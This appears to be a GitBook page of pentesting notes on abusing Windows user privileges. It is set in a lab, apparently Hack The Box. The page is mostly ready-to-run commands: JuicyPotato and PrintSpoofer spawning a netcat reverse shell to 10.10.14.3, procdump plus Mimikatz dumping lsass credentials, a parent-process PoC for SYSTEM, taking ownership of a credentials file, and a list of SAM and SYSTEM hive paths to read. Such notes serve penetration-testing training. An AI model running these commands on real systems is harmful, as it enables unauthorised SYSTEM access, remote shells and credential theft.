Martian Defense NoteBook
  • Martian Defense Notebook
  • Training and Career
    • Keeping it Real for Beginners
    • Reading and Repos
    • Media
    • Guides
      • Cybersecurity Roadmaps
      • Cybersecurity Training Topics
      • AppSec Training Pathway
      • Interview Checklist
    • Platforms
      • General
      • Offensive Security
      • Defensive Security
      • CTF Sites
      • Live Vulnerable Sites
    • Entrepreneurship Roadmaps
      • Consulting
      • Starting a Business
  • Technical Resources
    • Offensive-Cybersecurity
      • Application Security
      • General
      • Recon + OSINT
      • Infrastructure Pentesting
      • Cloud Pentesting
      • Wordlists
      • Social Engineering
      • Mobile Pentesting
      • Container Security
      • Blockchain
    • Defensive-Cybersecurity
    • General Cybersecurity
      • Cybersecurity Operating Systems
    • Coding/Programming
    • Reverse Engineering
    • AI and ML
  • Notes
    • Product Security Engineering
      • DevSecOps
        • Docker
          • How to Dockerize Applications with Docker Compose (Using SQLite and Flask)
      • SAST/SCA
        • How to setup a GitHub Action for Code Security analysis
        • JavaScript Security Analysis
        • Java Security 101
        • Tools
        • CodeQL for Beginners
      • Product Security Hardening
      • Threat Modeling
      • PHP Security
    • AppSec Testing
      • Checklists
        • WEB APP PENTESTING CHECKLIST
        • API Testing Checklist
        • Android Pentesting Checklist
        • IoS Pentesting Checklist
        • Thick Client Pentesting Checklist
        • Secure Code Review Checklist
      • Targeted Test Cases
        • Part 1
        • Part 2
      • Common Web Attack and Prevention List
      • Ports and associated Vectors
      • DNS
      • Web Tools
      • Command Injection Testing
      • JWTs and JSON
    • Security Research
      • Publishing CVEs
      • Threat Intelligence
      • Shodan Dork Cheatsheet
      • Github Dorks
      • Bug Bounty
        • Bug Bounty Programs
      • Forums
    • Coding/Programming
      • Secure Coding Practices Checklist
      • JavaScript
      • Python
        • Quick Notes
        • Python Basics for Pentesters
        • Python Snippets
        • XML Basics with Python
      • Golang
        • Theory
        • Security
        • Modules
        • Entry Points
        • File Forensics
        • Cryptography and Encoding
        • Golang Snippets
      • PHP
        • Setup
        • Syntax
        • Variables and Data Types
        • Control Structures
        • Arrays
        • Functions
        • OOP Concepts
        • Database Integration
        • Handling HTTP Methods
        • Session Management
        • File Uploads
        • Email Function
        • Error Handling
        • Advanced Topics and Best Practices
    • Network Security
      • Domain Trust Enumeration
      • Bleeding Edge Vulnerabilities
      • Post-Exploitation
      • Access Control Lists and Entries (ACL & ACE)
      • Credentialed Enumeration
      • Password Attacks
        • Internal Password Spraying
        • Remote Password Attacks
        • Linux Local Password Attacks
        • Windows Local Password Attacks
        • Windows Lateral Movement
      • PowerView
      • Pivoting, Tunneling and Forwarding
        • Advanced Tunneling Methods
        • Dynamic Port Forwarding (SSH + Socks)
        • Port Forwarding Tools
        • SoCat
      • Linux Privilege Escalation
      • Windows Privesc
        • OS Attacks
        • Windows User Privileges
        • Windows Group Privileges
        • Manual Enumeration
        • Credential Theft
      • Kerberos Attacks
        • Kerberos Quick Reference Sheet
    • Cloud Security Testing
    • Defensive Security
      • Splunk
        • Basic Queries
        • Dashboards
      • Forensics
        • Volatility
      • WireShark filters
    • Governance, Risk, Compliance
      • Vulnerability Management Lifecycle
    • Capture-the-Flag Training
      • Vulnerable Machine Checklist
      • Reverse Engineering Checklist
      • Mobile Checklist
      • Forensics Checklist
      • Binary Exploitation
      • Cryptography Checklist
    • Reporting
    • PowerShell
    • Linux Basics
    • Basic IT Tasks
  • Digital Privacy and Hygiene
    • Personal Information Removal Services
    • De-Googling Android
    • DNS Services
    • Privacy References
    • Opsec
  • RedPlanet Labs
    • PyGOAT
    • OWASP Juice Shop
Powered by GitBook
On this page
  • SeImpersonate Privilege
  • JuicyPatato Method
  • PrintSpoofer Method
  • SeDebugPrivilege
  • Dump Lsass
  • RCE
  • SeTakeOwnershipPrivilege
  1. Notes
  2. Network Security
  3. Windows Privesc

Windows User Privileges

PreviousOS AttacksNextWindows Group Privileges

Last updated 6 months ago

SeImpersonate Privilege

Attackers often abuse this privilege in the "Potato style" privescs - where a service account can SeImpersonate, but not obtain full SYSTEM level privileges.

JuicyPatato Method

https://github.com/ohpe/juicy-potato

c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

PrintSpoofer Method

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. https://github.com/itm4n/PrintSpoofer

c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

SeDebugPrivilege

To run a particular application or service or assist with troubleshooting, a user might be assigned the SeDebugPrivilege instead of adding the account into the administrators group.

We can use from the suite to leverage this privilege and dump process memory.

Dump Lsass

1 Dump lsass Process

procdump.exe -accepteula -ma lsass.exe lsass.dmp

2 Mimikatz Dump lsass Dump

# Specify Dump File
sekurlsa::minidump lsass.dmp

# Dump Creds
sekurlsa::logonpasswords

RCE

https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

1 List Processes

tasklist /svc

2 Use PoC Script

[MyProcess]::CreateProcessFromParent(612,"c:\Windows\System32\cmd.exe","")

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object," meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes.

https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

1 Enable Privilege

# Import Module
Import-Module .\Enable-Privilege.ps1

# Run Script
.\EnableAllTokenPrivs.ps1

# Verify 
whoami /priv

2 Check OwnerShip File

cmd /c dir /q 'C:\Department Shares\Private\IT'

3 Taking Ownership File

takeown /f 'C:\Department Shares\Private\IT\cred.txt'

4 Confirming Ownership

 Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

5 Modify ACL on File

icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

Interesting Files to Read

c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
ProcDump
SysInternals